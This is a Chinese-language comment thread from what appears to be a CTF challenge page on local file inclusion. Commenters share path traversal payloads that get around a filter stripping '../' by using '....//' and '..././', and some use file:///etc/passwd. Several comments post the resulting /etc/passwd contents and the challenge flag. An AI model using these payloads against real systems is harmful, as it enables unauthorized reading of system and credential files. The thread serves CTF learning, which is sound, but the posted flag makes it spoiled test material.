使用?language=./language/..././..././..././..././..././..././..././etc/passwd或者使用双写?language=/languages/....//....//....//....//....//....//etc/passwd
shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}
这是一个基本的绕过,因为 str_replace('../', '',$_GET['language'])这串代码../会被替换成空格,所以要进行一个绕过,用..././来代替../ 。url中写?language=./..././..././..././..././..././etc/passwd即可
/?language=/etc/passwd
直接用file:///etc/passwd居然也行 oAo
我这样怎么不行
?language=/languages//..//..//..//....//etc/passwd shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3} 就是这个样子
?language=/languages/....//....//....//....//etc/passwd
Half the truth is often a big lie: Look Here !!! root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nol
?language=./languages/....//....//....//....//etc/passwd,加这个成功了,谁能讲讲为啥
双写,../被屏蔽了然后还会存在一个../
...
评论
1005667204 7月前
举报
使用?language=./language/..././..././..././..././..././..././..././etc/passwd或者使用双写?language=/languages/....//....//....//....//....//....//etc/passwd
18993258097 7月前
举报
shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}
菜鸡的小韩 7月前
举报
这是一个基本的绕过,因为 str_replace('../', '',$_GET['language'])这串代码../会被替换成空格,所以要进行一个绕过,用..././来代替../ 。url中写?language=./..././..././..././..././..././etc/passwd即可
ABC第一深情 8月前
举报
/?language=/etc/passwd
曦羽unT0x1ns 9月前
举报
直接用file:///etc/passwd居然也行 oAo
13657809271 3月前
举报
我这样怎么不行
XHTX 9月前
举报
?language=/languages//..//..//..//....//etc/passwd shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3} 就是这个样子
868954104 11月前
举报
?language=/languages/....//....//....//....//etc/passwd
868954104 11月前
举报
shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}
yituoshi 1年前
举报
Half the truth is often a big lie: Look Here !!! root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nol
hh0100 1年前
举报
?language=./languages/....//....//....//....//etc/passwd,加这个成功了,谁能讲讲为啥
hack111 1年前
举报
双写,../被屏蔽了然后还会存在一个../